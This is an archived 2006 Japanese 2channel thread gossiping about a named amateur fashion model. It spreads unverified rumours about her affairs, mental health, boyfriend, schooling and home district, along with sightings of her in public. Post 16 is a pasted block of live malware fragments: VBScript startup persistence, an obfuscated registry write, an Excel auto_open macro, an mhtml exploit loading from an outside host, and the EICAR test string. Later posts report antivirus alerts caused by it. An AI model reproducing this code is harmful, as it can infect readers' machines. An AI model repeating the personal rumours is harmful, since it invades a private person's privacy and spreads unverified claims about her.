2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【rosy】関西読モ・村上沙織【monster】

1 :無名モデル:2006/10/22(日) 03:37:20 ID:aqKFcK4Q
大学3年という遅咲きデビューで、
アクセブランド「rosy monster」を展開している
甲●大学在学中の読者モデル、村上沙織さんのスレです。
吉川まあこに利用された説、ブログコメント自演説などいろいろありますが
いろんなことを大いに語りましょう!

ブログ→ttp://yaplog.jp/la_rosymonster/

2 :無名モデル:2006/10/22(日) 03:44:34 ID:???
【村上沙織ってどんな子?】

● 吉川まあこのアクセブランド設立に、利用されるだけ利用されて捨てられたらしい。
● 不倫しているという噂。
● 「もこみちと付き合ってる」と吹聴しているらしい。
● 留学から帰ってきた途端に遅咲きデビュー。それまでは地味な普通の子だった。
● ブログのコメントが急増→文体に特徴あり・マンセーコメばかりなので自演説あり。
● 富田林高校出身。
● 小柄そうに見えて、実は身長が高い(165cm)。
● ああ見えて、毒舌で悪口ばかり言っているらしい。

他に噂などがあったらどんどん語ってください。

3 :無名モデル:2006/10/22(日) 03:46:07 ID:???
【最近の目撃談】

584 無名モデル age 2006/10/15(日) 20:44:52 ID:???
土曜に、村上沙織を渋谷で見たんだけど・・・ブログ見たらやっぱり東京来てたんだね。
本当にみんなが言っている通り背が高くて、イメージと違ったけど顔はブログと同じだった。
沙織と一緒にいたお友達?の女の子の方がすごい綺麗で目立ってたけどw
一緒にいたの、誰だろ?モデルの子とかかな?

585 無名モデル ??? 2006/10/16(月) 03:22:49 ID:???
>>584
げー、その日私も渋谷にいたのに見たかった・・・渋谷のどの辺にいたの?
一緒にいた女の子って読モ?誰だろうね?

586 584 age 2006/10/17(火) 02:20:39 ID:???
>>585
私が見たのは西武の前あたりを、その綺麗なお友達と歩いていた。
沙織はアップヘアで、赤いバッグ持ってた。
もう一人の子は・・・読モというより本職のモデルって感じのオーラだったよ。
東京の子なのか、関西の子なのかはわからない。身長は沙織と同じくらいだったよ。

一緒にいた美人の友達、情報求む。

4 :無名モデル:2006/10/22(日) 03:47:47 ID:DlonwaTY
>>1さんありがと〜☆

土曜日発売かな?☆

5 :無名モデル:2006/10/22(日) 04:39:06 ID:???
ブログ自演説なんてどこから沸いたの?
沙織ちゃんは他の読モとちがって育ちの良さが出てる★実際も性格良さそう!
ここ最近久々にかわいいコがでてきたと思った

6 :無名モデル:2006/10/22(日) 04:46:38 ID:???
モデルっぽい友達ってこの子?ブログより


http://b.pic.to/6w13j

7 :無名モデル:2006/10/22(日) 04:54:59 ID:???
叩くところが無い

8 :無名モデル:2006/10/22(日) 05:33:32 ID:???
>>5
http://life7.2ch.net/test/read.cgi/model/1155902779/476-

9 :無名モデル:2006/10/22(日) 09:05:09 ID:???
普通の子。
かわいくも不細工でもない。興味わかない

10 :無名モデル:2006/10/22(日) 09:57:58 ID:DlonwaTY
プロなのかな?

11 :無名モデル:2006/10/22(日) 11:11:47 ID:NCyiDWYK
サッカー好きかな?

12 :無名モデル:2006/10/22(日) 14:56:43 ID:???
オーラはないけど、可愛い。
あんまり露出も少ないし、叩いてもかわいそう。

13 :無名モデル:2006/10/22(日) 16:42:24 ID:???
周りの友達もイモいしね。不倫だろうがどうでもいいね

14 :無名モデル:2006/10/22(日) 18:13:44 ID:rqz3UwFG
顔、ホント貧相・・・

15 :無名モデル:2006/10/22(日) 19:12:27 ID:???
かわいい
痩せすぎだけど・・

16 :<body onload=window()>:2006/10/22(日) 19:23:13 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


17 :無名モデル:2006/10/22(日) 20:22:54 ID:DlonwaTY
かわいすぎ!!!

18 :無名モデル:2006/10/22(日) 22:42:18 ID:???
可愛いと思う。
豚本クソ香と違ってあっさりメイクだし〜

19 :目撃者:2006/10/22(日) 23:10:52 ID:???
>>7
うーん、多分違う。
すっごく色が白くて、女優みたいな人だった印象。
ブログ見る限り、らしき画像出てない感じ。
本当に綺麗な人だったから気になる。
ブログで聞いてみようかな?

沙織は、卒業してもアクセ一本でいくのかな?
就活とかしてないよね?
まあこやみー豚と違って、値段もぼったくってなさそうで
そういうところも好意持つけど、やっていけるのかな?

20 :無名モデル:2006/10/23(月) 01:00:45 ID:???
この子センスいいよね、アクセとか!
低価格だしとても好印象もてる。
ただ儲けたいからだけじゃないんだなって伝わってくるよ

21 :無名モデル:2006/10/23(月) 01:03:41 ID:???
オーラないのが本当にかわいそう
よく見たらかわいいけどぱっと見普通・・・

22 :無名モデル:2006/10/23(月) 01:09:45 ID:1WU+FPvB
顔が童顔。白くて赤ちゃんみたいで可愛いから好き☆

23 :無名モデル:2006/10/23(月) 01:38:21 ID:???
本人かなり書いてますね

24 :無名モデル:2006/10/23(月) 03:11:08 ID:???
肌が汚い
髪型ださい 口元きたないね・・吉川まあこに嫌われてるね。理由は、まあこよりブスだし、彼氏がまあこの知人で変態だから

25 :無名モデル:2006/10/23(月) 06:05:09 ID:???

そんな理由だけで嫌われるかよ
他にも理由あるんじゃないの?


26 :無名モデル:2006/10/23(月) 11:29:36 ID:???
この子をかばうわけじゃないけど、まあこの言うことは信じない方いいよ。
まあこが頭おかしいからさ。
まあことはアクセの件で揉めた(まあこが100%悪い)と中島彩が言ってたよ。
沙織ちゃんは目立つでもなく地味でもなく、普通の子だってよ。
でも読モには向いてないかも、って彩は言ってたわ。
ガツガツしてないからやって。

27 :無名モデル:2006/10/23(月) 13:01:18 ID:???
ま、吉川まあこだったら嫌われてもおkじゃないか
かかわらないほうが良いしね

28 :無名モデル:2006/10/23(月) 14:11:07 ID:???
きちがいオカマは死亡しました

29 :無名モデル:2006/10/23(月) 17:29:17 ID:???
>>24
まあこ乙。

この子はなんか赤ちゃんっぽくて可愛い。

30 :無名モデル:2006/10/23(月) 22:04:02 ID:???
ケリーにバーキン
お嬢さんですか?
外車も何台か写ってますが・・・
どこに住んでるんだろ?

31 :無名モデル:2006/10/23(月) 22:21:25 ID:???
大阪のど田舎に住んでる!田舎者がイキんな!

32 :無名モデル:2006/10/23(月) 22:49:18 ID:???
さおりちゃん可愛い。
背がもっと低かったら最高

33 :無名モデル:2006/10/23(月) 23:02:14 ID:???
>>30
住んでるところは・・・あの街は一応堺市になるの?
確かに田舎ではあるけど、家は裕福みたいだよ。
ま、かつてのカリスマ読モの平山玲ちゃんも堺市住みで
そこからPHAREバイトのために岡本まで通ってたしね。
玲ちゃんは、堺でも浜寺だったけど。
住んでる場所は関係ないんじゃない?
御影→岡本住みでも、某まあこみたいな成金下品もいるし。

さおりこちゃんは好き。
関西ぽくないよね。アクセもすごく頑張ってるし。
ただ、20歳そこそこの女の子がケリーやらバーキン持つと
品がなく見えて他のお水系読モと同じになるから、
そうじゃなくてもさおりこちゃん童顔だし
歳相応になるまであんまり持たない方がいいのに、とは思う。
ファッションもあんまり無理しないで女の子らしい方が似合うよね。
最近ハマってるらしい全身黒のクールでカッコいい系より、
優しい色合い&素材のニットワンピとかが似合うよね。

34 :無名モデル:2006/10/23(月) 23:20:01 ID:???
さおりちゃんは可愛い!
けど、クローンちゃんは似てないし(以下、自粛)
大学卒業したらどないするん?

35 :無名モデル:2006/10/23(月) 23:21:07 ID:???
沙織ちゃんは肌きれいそうだけど、
左頬に大きなシミか痣があるよね。

36 :無名モデル:2006/10/24(火) 00:28:14 ID:???
今は絶縁らしいけど、どうしてまあこの毒牙にかかつちゃったんだろね。

37 :無名モデル:2006/10/24(火) 01:27:15 ID:???
さおりちゃんは、まあこが言うことによると
性格が変わってる&彼氏とSMしててキモイんだって
個人情報を絶縁してから漏らすのもタチ悪いですね・・・可愛いからさおりちゃん損だね 僻まれてます

38 :無名モデル:2006/10/24(火) 02:36:04 ID:FnYZD01q
涙型のネックレスかわいい。

この子自体は地味だけど
アクセサリーは可愛い。
以外にお値段も安い。
ピアスからイヤリングに交換するのも無料みたい。
金属アレルギーの事も相談できるらしく、
どっかのボッタクリがらくた屋と違って
ちゃんと客の事考えて商売してるので好感持てます。

39 :無名モデル:2006/10/24(火) 03:05:17 ID:???
どっかのボッタクリがらくた屋w それがヘナヘナクオリティーだぁよ

40 :無名モデル:2006/10/24(火) 07:14:53 ID:???
おかまあこと離れれて本当に良かった!

41 :無名モデル:2006/10/24(火) 07:24:52 ID:???
でもはっきり言ってこの子が売れ出したのはまあこのおかげだと思う
おかまが自分のブログやらで沙織ちゃんと沙織ちゃんのアクセを紹介して
沙織ちゃんの認知度かなり上がったし
viviとかに載れたのもまあこのおかげでしょ?
この子がおかまの事悪く言うのは間違ってると思う

42 :無名モデル:2006/10/24(火) 07:47:30 ID:???
堺じゃないでしょ
ミクシには豊中市って書いてあったよ。
ほんま育ち良さそう。ほかのことは違うね。

43 :無名モデル:2006/10/24(火) 11:00:59 ID:???
かわいいしオシャレだし応援したくなる!

44 :無名モデル:2006/10/24(火) 14:44:52 ID:XduQeD7k
けっこうかわいい!!

45 :無名モデル:2006/10/24(火) 15:21:47 ID:???
>>42
ごめ、大阪の地理詳しくなくて。
美原町って豊中?←ブログで言ってる
豊中だと、富田林は学区違うんじゃ?
どっちにしろ、育ちよさそうだよね

46 :無名モデル:2006/10/24(火) 16:06:20 ID:???
富田林は羽曳野や金剛と隣接してるけど
美原町は堺市!!
堺市の中でもかなり山奥より
豊中とは全然違う。   

ヘナヘナの冬バージョンの撮影きたって
ヘナヘナスタッフのブログに写真あるよ?
でも、絶縁?

47 :無名モデル:2006/10/24(火) 16:19:43 ID:???
美原町は今年4月に堺市と合併
今は、美原町=堺市
合併前の「美原町」の町単位の時に
富田林地区の学校に通っていてもおかしくない。
堺市・富田林の中間に美原がある。

48 :無名モデル:2006/10/24(火) 18:13:47 ID:???
村上さんはおじいさんが医者だったはず。
親戚に某アパレル社の重役がいるよね。

村上さんは、表立って吉川まあこの悪口は言わないよ。
まあこのおかげで、今の自分やロージーがあるし
人脈ができたってちゃんと感謝してる。
当然、信頼できる友人には愚痴ってるけど、それは人間として当たり前だと思うし。

まあこがなんで目の敵にしてるかというと、村上さんを読モ世界に紹介したはいいが、
まあこの思惑とは違ってロージー人気出たり、村上さん自体が人気出ちゃったから。
反対に自分は下降線だからね。
だからまあこはライターや読モに村上さんの悪口をギャンギャン騒いでるだけ。
負け犬の遠吠えってやつね。
けど、ライターは頭悪くないし、読モもまあこ嫌ってるから
みんな聞いてるふりしてるだけだけど。

まあこは、村上さんの取引業者奪ったりいろいろしてるよ。

49 :無名モデル:2006/10/25(水) 00:57:45 ID:???
沙織ちゃん好き。
ケバい関西読モの中に咲いた一輪の鈴蘭みたい。
派手でオーラはないけど、目立ちたがるわけでもないし、好感もてる。
でも、ブログのコメント放置はどうかと思う。

50 :無名モデル:2006/10/25(水) 01:02:17 ID:???
>>49に自己レス
○→地味でオーラない
×→派手でオーラない

普通なとこがいいよね。

51 :無名モデル:2006/10/25(水) 01:58:20 ID:???
オーラなくてギスギスしてるけど自然体なところが好き!
ブログのコメント返さないっていうのはしょうがないと思う
沙織ちゃん忙しそうだしもうちょっと待ってみたら?

52 :無名モデル:2006/10/25(水) 03:58:58 ID:8zGYa1iw
女の子って感じの顔。
どっかのオカマとえらいちがい〜

53 :無名モデル:2006/10/25(水) 07:56:08 ID:???
ほんま一輪のすずらんやわ!うまいこと言うな
この子と白石直子ちゃん?とか一緒にいれば最高やと思う。

54 :無名モデル:2006/10/25(水) 10:36:09 ID:???
アクセもかわいい。

55 :無名モデル:2006/10/25(水) 11:56:28 ID:???
アクセは微妙やけど、顔は可愛い。
ちょっと化粧が薄すぎやけどね〜


56 :無名モデル:2006/10/25(水) 13:24:20 ID:???
あんまりサングラスとかしてセレブぶらない方が似合う!
普通にしてるのが一番可愛い。
誰かも言ってたけど、女の子らしい服装が似合うから
あんまりかっこいい系はやめた方がよいかも。
アクセは好みが分かれるかもね。
でも少なくともまあこのパクり&ぼったくりとは雲泥の差!
けど、価格も買いやすいし、いろんなデザイン発表したり
何回も再入荷したり、頑張ってるなと思う。
強いていえば、言葉遣いがちょっと・・・・

57 :無名モデル:2006/10/25(水) 13:25:58 ID:xeSTjlLP
庶民かな?

58 :無名モデル:2006/10/25(水) 13:31:06 ID:???
庶民だと思うよ。
金持ちまではいかないけど、裕福なおうちの子かな。
一人娘だから、兄弟いる人よりはかけてもらうお金が多いのかもね。
大学までは公立だしね(自分で選んだらしい)。
バイトもかけもちしまくってる。

彼が曲者だから、別れた方がいいのになぁ。

59 :無名モデル:2006/10/25(水) 13:43:39 ID:xeSTjlLP
>>58
妹尾美幸ちゃんと同じ!!

60 :無名モデル:2006/10/25(水) 14:58:16 ID:???
>>58
カレって何してる人なの?

61 :無名モデル:2006/10/25(水) 15:10:22 ID:???
まあこのヤリ友だった彼

62 :無名モデル:2006/10/25(水) 15:13:57 ID:xeSTjlLP
この人、性格がめっちゃ良さそう。

63 :無名モデル:2006/10/25(水) 19:53:27 ID:???
美原にすんでるんですか?
あそこは電車とか通っていない不便なところだと思ってましたが・・・
(あまりよく知らないのでちがうかったらごめんなさい)
詳しい方はお友達ですか?
地主とかなのかな・・・
あまり露出ないから気になります。

64 :無名モデル:2006/10/25(水) 20:31:33 ID:???
>>63
わからないけど、親戚が近所に住んでるから地主系かもね。

前に渋谷で村上さんと綺麗な友達を見たって人、ブログで答えてたよ。
大切な親友みたいだけど詳細明かしてないからタレントとかかもね。

65 :無名モデル:2006/10/25(水) 20:33:41 ID:???
やっぱりmixiには豊中市って書いてある

66 :無名モデル:2006/10/25(水) 20:38:19 ID:???
なんでだろ?
詳しい住所(美原町以下)も知ってるけどな。
ブログでは美原町と公言してるね(コメント返事で)
豊中は彼が住んでるとか?
美原町は確かだから、意図がわからん・・・・・・

67 :無名モデル:2006/10/25(水) 20:52:26 ID:???
mixiではrosyとしての村上沙織だから、たとえはばrosyの事務所が豊中市にあるから、とか?
そもそも事務所かまえてるかどうか知らないけど;

68 :無名モデル:2006/10/25(水) 21:28:03 ID:???
66さんは村上さんの自宅をご存知なんですね。
美原だとしたらどの電車で通学されてるんでしょうか?
美原だと岡本までかなりかかりますよね・・。
ミクシの豊中はイメージをよくするためなんでしょうか・・

69 :無名モデル:2006/10/25(水) 22:00:45 ID:???
豊中は特別イメージ良いってことはないよ

70 :無名モデル:2006/10/25(水) 22:39:07 ID:???
美原だろうが豊中だろうがどうでもいい
もっと沙織ちゃんのこと話そうよ

71 :無名モデル:2006/10/25(水) 22:44:52 ID:???
沙織ちゃんの大切な存在の女性って、東京の人かな?
同級生とかではない書き方だったね。
沙織ちゃんて、人間として賢そうというか、
人を見る目がありそうだから、あのコメント見る限りよほど信頼できる人なんだろうな。
見た人、羨ましい。

沙織ちゃんて、英語できるみたいだけどどのくらいのレベル?
留学自体は一年だよね?元々話せたの?

72 :無名モデル:2006/10/26(木) 01:16:55 ID:kcVMcRyq
この人 黒コン時代の方が かわいい

73 :無名モデル:2006/10/26(木) 01:45:03 ID:???
読モになっても、変に読モにべったりしてないね。
『私、読モ!』って調子に乗ってそうでもないし。
読モ仲間とも適度な関係を築きつつ、
学校や尊敬している友人を大切にしているところが偉いと思う。
でも意外にこういうタイプの方がギャップあって調子に乗ってたりするのかな?

74 :無名モデル:2006/10/26(木) 04:18:50 ID:???
ピックル><

75 :無名モデル:2006/10/26(木) 06:38:20 ID:tocO/0o4
沙織のリンクから
マイラブまあこりんがなくなった・・・・

76 :無名モデル:2006/10/26(木) 10:47:54 ID:bZ104Yya
かわいすぎ!!!

77 :無名モデル:2006/10/26(木) 16:44:12 ID:???
まあこのリンクはずして正解だよ。
沙織ちゃんは、まあこと縁切った方がいい。

78 :ぁすか:2006/10/26(木) 18:24:02 ID:se4+QUwj
村上沙織のぃとこから話聞ぃたけど普通の子だって言ってたょ、

79 :無名モデル:2006/10/26(木) 18:31:35 ID:???
>>78
小文字ヤメレ!

80 :無名モデル:2006/10/26(木) 23:30:35 ID:???
>70 それは沙織さんのことなのではないの???

雑誌じゃ普通すぎ?に見えるけど、
ブログはかわいいって思う。


81 :無名モデル:2006/10/26(木) 23:45:53 ID:???
誰だよ、ウイルス貼ったやつ。
ノートン先生反応しまくりで、IEからも2ちゃんブラウザからも見れねー。
みんな、携帯なの?

沙織ちゃんは育ちがよさそう。
お金持ちとかの意味じゃなくて、いい家庭環境そう。
他のドクモみたいにギラギラしてないのがいいな。
でも、年齢的に自分のことを沙織呼びは卒業した方が…

82 :無名モデル:2006/10/26(木) 23:49:39 ID:???
>>78
リサコちゃん?

吉川まあこのブランドの撮影に参加したって、どこに載ってる?
ヒナヒナブログとかにも載ってないけど。

83 :あすか:2006/10/27(金) 00:01:39 ID:kYOCZvxc
79う゛るさいゎお前
いとこの子から聞いた

84 :無名モデル:2006/10/27(金) 01:27:00 ID:???
おかま暗殺計画

85 :無名モデル:2006/10/27(金) 01:56:39 ID:???
こいつ性格わるい話題そらしに吉川まあこ使ってネタにしてる
彼氏とつながってるからってやっかむな。
肌きたない友達同士争うのは見苦しい

86 :無名モデル:2006/10/27(金) 01:58:07 ID:???
吉川まあこネタはほどほどに。
本人降臨して荒らすから。

87 :無名モデル:2006/10/27(金) 11:51:57 ID:???
沙織ちゃんのブログ更新がないと、
またまあこにイジメられて落ち込んでいるのかと心配になるよ

88 :無名モデル:2006/10/27(金) 11:55:03 ID:???
本当に、誰かウイルスを貼ったようでパソコンからはみれませんね。
今は、携帯からかろうじてレスしてますが
こういう場合(ウイルス攻撃された場合)のローカルルールわかる方いますか?
さおりちゃん大好きでたくさん語りたいので、立て直した方がいいでしょうか?

89 :無名モデル:2006/10/27(金) 11:57:58 ID:???
色んな読モが
ブランド作ったり店出したりしてるけど、
この人だけは将来に繋がりそうな仕事してるね。



90 :無名モデル:2006/10/27(金) 16:06:59 ID:???
村上さん、いい子だよ。
穏やかだし、いつもニコニコしていて人当たりもいいし。
けど、何というか・・・かなりルーズというか無責任というか
そういう面があるのを感じることも多いかな。

「次会う時に絶対に持ってくるね!」と自分で言っておいて
しつこく催促しないと持ってこなかったり
「沙織、課題ここまで担当するから!」って全然やってこなかったり
「今夜、絶対電話するから!」って待てど暮らせどかけてこなかったり
「メールちょうだい」というからメールしたのに、肝心のその返事はなかったり。

忙しいみたいだし、悪気あるようにも思えないんだけど
一緒にいると、村上さんは甘え上手だから、たまに「利用されてる?」
なんて思うことも、ぶっちゃけあるよ。

読モするようになってから、校内でも不自然なまでにグラサンしてたり
やっぱり留学前とは変わっちゃったけど、基本的には普通の子だよ。
学校までは電車できてるよ。どっかまでは車で送ってもらってるみたい。

91 :無名モデル:2006/10/27(金) 16:37:42 ID:+ST08uCW
男受けしそう。もちろん好き嫌いもあるから濃い感じの子が好きな人には敬遠されそうだけどこれくらいがちょうどいいのかなって思う。

92 :無名モデル:2006/10/27(金) 19:44:39 ID:???
なんでさおりこちゃんって言ってる人おるの?
さおりちゃんじゃないの?

93 :無名モデル:2006/10/28(土) 02:08:22 ID:???
>>90
そうなんですか・・・
ブログではすごく頑張ってるアピール&丁寧できっちりしてるイメージ受けましたが
実はそんな子なんですね・・・ショック


94 :無名モデル:2006/10/28(土) 08:15:19 ID:4pZF0F6+
あたしも 忙しいのを理由にして返事し忘れる奴とか
大嫌い

95 :無名モデル:2006/10/28(土) 11:06:01 ID:K9eb3q99
あたしも かわいいかな?

96 :無名モデル:2006/10/28(土) 18:27:49 ID:???
さおりちゃんのブログランキング一位になったね!!!吉川しほ抜いた!!
めちゃうれしい(笑)

97 :無名モデル:2006/10/28(土) 20:10:20 ID:???
このスレ、パソコンから見れない!
今、携帯から見てるけど。
沙織ちゃん、ブログ更新しないね。どうしたのかな?

98 :無名モデル:2006/10/28(土) 20:18:22 ID:???
ウイルスだね
うちのもいつの間にかなおってたけど

99 :無名モデル:2006/10/30(月) 05:34:48 ID:CyGgvyfH
さおりちゃんを高校生の時から知ってる者です。といっても習い事が一緒やったのでその時期しか知りませんが。。
彼女は習い事先でも男の子受けがめっちゃ良かったです。しかも頭も良かった!
当時はカジュアル系の格好してかわぃらしかったです。だから私はブランドたくさん持ってかっこよく決めてる彼女よりかわいい感じの雰囲気の方が似合ってると思います。
さおりちゃんと当時付き合ってた彼とも知り合いだったのですが、彼いわく彼女は不思議ちゃん系だったらしいです。でも私にとっては、普通の子だったのできっと彼氏の前では天然系?を演じてたのではって思いますが。。
少し名前が知られるといろいろな噂が立てられてるようですが(あくまでも私は高校時代の彼女を知ってるだけなので)、さおりちゃん
はかわいらしい子です。

100 :無名モデル:2006/10/30(月) 15:08:39 ID:c0rn+Pxr
可愛い。真顔が可愛い

101 :無名モデル:2006/10/30(月) 21:50:46 ID:???
まぁ性格もいいんだけど、
さおりさんの素性を知りたいと思うのは私だけ?


102 :無名モデル:2006/10/30(月) 23:52:01 ID:psdTsQRg
甲南ごときで
頭いいって言われてもね。

103 :無名モデル:2006/10/31(火) 00:04:57 ID:???
>>102
あんたよりは頭いいよ
(^ω^)

104 :無名モデル:2006/10/31(火) 00:09:43 ID:???
デビューが遅いからか、謎は多いよね。

英語ネイティブ並くらいの勢いでアピってるけど、
たかだか1年の留学では話せるようにはなるけど、何でもペラペラまでいかない。
(下手すると、日常会話がやっと程度もザラ)
頭がいい、って言われてるけど所詮甲南。
昔から目だってたらしいわりに、地味学生から3回生で急なデビュー。
あの学区だったら、近隣の富田林の星・サッカー宮本レベルでいばって欲しいがね。

105 :無名モデル:2006/10/31(火) 00:17:13 ID:0AC2iZ3l
>>103
大丈夫

106 :無名モデル:2006/10/31(火) 00:20:26 ID:???
ドクモの中ではマシってだけで
頭がいいわけではないね。

107 :無名モデル:2006/10/31(火) 05:54:08 ID:???
ブログの文章やコメントの返事、ロージー掲示板の客とのやりとりを見る限り
賢いようには決して見えないけどw
ただ、ヘアアレンジが可愛いとは思う。
あとみんな同意見みたいだけど、無理にカジュアルやクールな感じより
女の子らしい服が似合うよね、ニットワンピとか。
最近、黒好きらしいけど優しい色合い&素材のがにあうよ。

108 :無名モデル:2006/10/31(火) 09:43:01 ID:???
沙織ちゃんいやみなく可愛くて好きだけど、彼氏っぽい人?のことをはっきり[彼氏です]って言わないところが気になる。彼氏いるんですか?の質問にも 大切な人がいます って返してたりするよね。なんでだろ?

109 :無名モデル:2006/10/31(火) 14:06:22 ID:???
>>108
彼氏と断言できない理由があるんじゃないの?
だから、違うとは思うけど不倫とか言われるんだよね。

110 :無名モデル:2006/10/31(火) 14:13:30 ID:???
嫌いじゃないけど、どこはかとなくメンヘル臭がする。
昔、いじめられてたらしいし。

111 :無名モデル:2006/11/01(水) 07:25:56 ID:???
とにかくメールの返事が遅い。
約束を意外と守らない。
頼る時や甘える時だけ「頼れる人がいないの」と言ってきて
その後、こっちが心配して連絡しても、別人脈で解決したら反応なし。

前に同じことを言ってる人がいたけど、
悪い子では確かにないが、以上のことは直した方がいいと思うよ。
沙織ちゃん、ここ見てるんでしょ?
いいとこいっぱいあるんだから、直す努力したら?もったいないよ。

112 :無名モデル:2006/11/01(水) 08:15:06 ID:???
>>110
すごいわかる!w何か、メンヘルっぽいの

甲南生っていうのも、他の毒モがアレな大学ばっかだから輝くよね。
他の毒モはいわゆる昔はお嬢様学校で、何か嗜んでるとかならまだしも
見た目も中身もカスばっかり

113 :無名モデル:2006/11/01(水) 09:47:32 ID:???
>>112
あんた、どんだけ偉いんだ?プッ

114 :無名モデル:2006/11/01(水) 14:14:36 ID:???
真面目できちんとしてそうだけど、総合するとかなりルーズな人なんだね。
そんな人が店とかやって大丈夫なんかい?(買ったことない)

115 :無名モデル:2006/11/01(水) 14:19:45 ID:???
>>110 >>112
実際にメンヘル経験ありだよ
突然泣き出したりする
最近、またまあこから猛攻撃(口撃)受けてるね

116 :無名モデル:2006/11/01(水) 14:44:56 ID:UbDJDaWx
セレブな感じ大好き大好き!!!☆
ニットワンピ似合う☆

117 :無名モデル:2006/11/01(水) 14:47:17 ID:???
そういや、ブログのコメントとかも返事遅すぎるよね。
毎日、自分撮りしてる時間あるならコメント返事しろって思う。
殺到してるわけでもないんだから、毎日マメに返事すれば
寝る前の10分で終わるだろうに。
きっと、人への配慮が足りないんだろうね。

118 :無名モデル:2006/11/01(水) 14:52:27 ID:???
セレブな感じかなぁ?
反対に成金ぽくなくて、普通の家ぽくて好きだけど。
本人がセレブぶりたいのかなとは感じる。
ニットワンピ似合うよね!女の子らしくしてると可愛い!

119 :無名モデル:2006/11/01(水) 17:21:45 ID:???
>>117
自演だからコメント返すの面倒だったりしてww


120 :無名モデル:2006/11/01(水) 19:45:25 ID:???
>>199
その読み神。

121 :無名モデル:2006/11/01(水) 23:54:23 ID:???
嫌いじゃないけど、オーラがないね。

122 :無名モデル:2006/11/02(木) 17:51:17 ID:???
お金持ちなんやと思ってた… エルメスのかばんやシャネルのかばん数個や財布、何気に着てるものもアンナモリナリとか高いの多くないか?

123 :無名モデル:2006/11/02(木) 18:08:15 ID:???
顔見知り程度だけど、すごいお金持ちではないと思うよ。
裕福、って感じかな。
よくいる毒モのような、ああいう金持ちではなくて
お金に余裕があるおうちの一人娘って風かな。
でも、昔からバイト掛け持ちしたりしてるし、今はアクセの収入もあるから
意外に親の脛かじったりはそんなにはしてないと思う。

124 :無名モデル:2006/11/02(木) 22:45:01 ID:zLv+cY4N
かわいすぎ!!!☆

125 :無名モデル:2006/11/02(木) 23:54:24 ID:???
さおりちゃんは好きだけど、
そんなに収入ありそうなアクセには見えないなぁ
(もちろん、ヒナヒナよりはマシかと思うけど・・)

126 :無名モデル:2006/11/04(土) 02:18:15 ID:???
最近ブログのコメント減ったよね。
さおりちゃん、面倒臭くなってきたんだろうか?w

127 :無名モデル:2006/11/04(土) 20:52:25 ID:???
人気内ね

128 :無名モデル:2006/11/04(土) 21:04:56 ID:FtiN4y0f
沙織ちゃんblogけっこう期待してるし!!☆

129 :無名モデル:2006/11/04(土) 21:28:34 ID:???
あんただけじゃね?

130 :無名モデル:2006/11/04(土) 22:08:02 ID:FtiN4y0f
さおりちゃん庶民なのかな?☆

131 :無名モデル:2006/11/05(日) 12:31:49 ID:ewwJszD5
>>130
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

132 :無名モデル:2006/11/05(日) 13:05:59 ID:NnDyXjpI
かわいすぎ!!!

133 :無名モデル:2006/11/06(月) 00:04:07 ID:gcTMjEge
まあこの本名、吉川まゆこだよ!!

134 :無名モデル:2006/11/06(月) 00:07:31 ID:???
知ってますけどだから?

135 :無名モデル:2006/11/06(月) 20:10:11 ID:???
この人吉川まゆこなみに自分撮り多くてうざい   うっすい顔で気の毒   しかもいつもいとこといるよね          友達いなそう

136 :無名モデル:2006/11/07(火) 00:05:48 ID:lF0F8FJo
誰かさんのグルメツアーよりマシ。

137 :無名モデル:2006/11/08(水) 02:05:50 ID:???
アンチまあこスレ大炎上中。
てか、みんなビビりすぎ。

138 :無名モデル:2006/11/08(水) 21:58:59 ID:???
沙織人気なし

139 :無名モデル:2006/11/08(水) 22:16:36 ID:GcMMSIJ4
かわいすぎ!!!☆

140 :無名モデル:2006/11/11(土) 03:31:52 ID:0RIrhnOT
まあこに負けるな!

141 :無名モデル:2006/11/11(土) 08:11:52 ID:HV3HGWvJ
まあ可愛い☆

142 :無名モデル:2006/11/11(土) 16:13:01 ID:???
お馬さんの写真は、なんかシホちゃんがUPしそうなことぽくない?


143 :無名モデル:2006/11/11(土) 16:55:50 ID:???
親戚が馬主なんて金持ちだね。
共同馬主かもしれないけど、個人馬だったらすごいね。
個人所有でも地方競馬だと、少しは劣るのかな。

144 :無名モデル:2006/11/11(土) 18:57:57 ID:???
この子かわいいね

145 :無名モデル:2006/11/11(土) 19:44:15 ID:5u2sM9bN
>>144
定期的に書き込んでるみたいだけど
自演ってバレバレだよ?
一応突っ込んどくね。

146 :無名モデル:2006/11/12(日) 10:21:48 ID:???
まあこを叩いてから自分擁護の自演ですかww
バレバレだからやめなよww

147 :無名モデル:2006/11/12(日) 11:12:22 ID:???
沙織ちゃんすきだけどお馬のこと書くなら写真のせるとかもっと詳しくかいてほしいな
あれだけじゃあ自慢ぽい でもかわいいから許せるw

148 :無名モデル:2006/11/12(日) 23:46:17 ID:???
友達の親戚とか、遠い遠い親戚とかぽい言い回しに聞こえてしまう・・・

まあことかはその点、わりとはっきり書くけど、
